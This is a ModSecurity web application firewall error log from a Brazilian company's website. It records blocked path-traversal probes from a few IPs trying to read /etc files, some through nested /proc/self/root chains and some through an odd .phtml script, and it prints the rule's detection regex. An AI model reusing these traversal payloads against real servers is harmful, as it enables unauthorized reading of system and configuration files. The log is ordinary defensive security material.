[Fri Mar 20 06:14:02.246225 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.243.128:54970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P2V1pVZ5mVmJwsFMbbgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:14:04.831912 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:54972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P3PqxLDW4GITHUkTQ1gAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:14:06.179021 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:54978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P3uoXxyEfFpUF8f9s7wAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:14:07.391596 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.243.128:54988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P3zJ3M9BSuKP7CAYC9wAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:14:11.022725 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:54992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P4bninkcc-iUj5ApJ2QAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:14:12.990028 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:47668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P5PqxLDW4GITHUkTQ2wAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:14:18.027696 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:47682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P6l1pVZ5mVmJwsFMbgAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:14:19.590725 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:34248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P67ninkcc-iUj5ApJ4QAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:14:27.063211 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:34264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P8xCii7xarUs8iHZTlQAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:14:29.548292 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:34266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P9da6ubjKNq_cu4a9wAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:14:32.888910 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:40922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P-F1pVZ5mVmJwsFMbhAAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:15:35.907506 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:40940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0QNwF0L0L-SsrnPo5TTgAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:15:43.357925 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:59578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0QPwF0L0L-SsrnPo5TVgAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:15:50.359228 2026] [:error] [pid 11642:tid 140411725141760] [client 57.141.18.88:56438] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QRrninkcc-iUj5ApKAQAAA4I"]
[Fri Mar 20 06:15:50.586578 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.41:56478] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QRvqxLDW4GITHUkTRIwAAAQg"]
[Fri Mar 20 06:15:51.097444 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.77:56320] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QR11pVZ5mVmJwsFMbrAAAAE8"]
[Fri Mar 20 06:15:51.973271 2026] [:error] [pid 11642:tid 140411733534464] [client 57.141.18.1:56534] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QR7ninkcc-iUj5ApKAgAAA4E"]
[Fri Mar 20 06:15:52.397322 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.82:56542] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSDJ3M9BSuKP7CAYDOwAAAI0"]
[Fri Mar 20 06:15:52.474325 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.115:56544] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSNa6ubjKNq_cu4a9-wAAA0w"]
[Fri Mar 20 06:15:52.808948 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.66:56548] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSNa6ubjKNq_cu4a9_AAAA0U"]
[Fri Mar 20 06:15:53.231728 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.0:56564] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSbninkcc-iUj5ApKAwAAA5Q"]
[Fri Mar 20 06:15:53.672845 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.15:56572] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSda6ubjKNq_cu4a9_QAAA1A"]
[Fri Mar 20 06:15:54.025996 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.87:56580] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QShCii7xarUs8iHZTxwAAAgo"]
[Fri Mar 20 06:15:54.216681 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.92:56586] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QSjJ3M9BSuKP7CAYDPAAAAJI"]
